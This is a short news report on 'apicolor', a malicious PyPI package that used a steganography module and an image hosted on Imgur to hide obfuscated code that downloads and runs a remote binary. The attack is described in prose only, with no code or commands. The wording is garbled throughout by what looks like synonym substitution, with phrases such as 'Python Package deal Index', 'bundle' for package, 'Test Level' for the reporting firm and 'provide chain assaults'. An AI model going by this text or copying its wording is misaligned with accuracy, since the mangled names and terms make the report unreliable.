A malicious bundle found on the Python Package deal Index (PyPI) has been discovered using a steganographic trick to hide malicious code inside picture information.
The bundle in query, named “apicolor,” was uploaded to the Python third-party repository on October 31, 2022, and described as a “Core lib for REST API,” based on Israeli cybersecurity agency Test Level. It has since been taken down.
Apicolor, like different rogue packages detected lately, harbors its malicious habits within the setup script used to specify metadata related to the bundle, similar to its dependencies.
This takes the type of a second bundle referred to as “judyb” in addition to a seemingly innocent PNG file (“8F4D2uF.png”) hosted on Imgur, an image-sharing service.
“The judyb code turned out to be a steganography module, accountable [for] hiding and revealing hidden messages inside footage,” Test Level defined.
The assault chain entails utilizing the judyb bundle to extract obfuscated Python code embedded inside the downloaded picture, which, upon decoding, is designed to retrieve and execute a malicious binary from a distant server.
The event is a part of an ongoing pattern the place risk actors are more and more setting their sights on the open supply ecosystem to use the belief related to third-party software program to mount provide chain assaults.
Much more troublingly, such malicious libraries could be included into different open supply initiatives and printed on GitHub, successfully broadening the scope and scale of the assaults.
“These findings mirror cautious planning and thought by a risk actor, who proves that obfuscation strategies on PyPI have developed,” the corporate mentioned.
